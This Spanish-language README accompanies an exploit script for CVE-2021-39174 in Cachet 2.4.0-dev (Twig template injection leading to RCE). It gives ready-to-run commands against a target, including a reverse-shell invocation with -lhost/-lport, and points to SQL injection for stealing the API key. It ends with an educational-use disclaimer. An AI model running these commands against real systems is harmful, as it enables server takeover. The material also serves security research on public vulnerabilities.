
CVE-2021-39174 Cachet 2.4.0-dev
Un script de python3 para CVE-2021-39174 Cachet 2.4.0-dev: divulgación de información y RCE mediante inyección de plantillas Twig en el lado del servidor. Para el RCE se necesita la API KEY del usuario. Consulta el enlace de Leave Songs a continuación, que cubre cómo obtener la API KEY mediante inyección SQL CVE-2021-39165.
python3 cachet_2.4.0-dev.py -t http://cachet.site/ -u username -p password
python3 cachet_2.4.0-dev.py -t http://cachet.site/ -u username -p password -k API_KEY -lhost 127.0.0.1 -lport 1337
Para el menú de ayuda:
python3 cachet_2.4.0-dev.py -h
Todo el código proporcionado en este repositorio es solo para fines educativos/de investigación. Cualquier acción y/o actividad relacionada con el material contenido en este repositorio es responsabilidad exclusiva tuya. El uso indebido del código de este repositorio puede dar lugar a cargos penales contra las personas en cuestión. El autor no será considerado responsable en caso de que se presenten cargos penales contra cualquier individuo que haga un uso indebido del código de este repositorio para infringir la ley.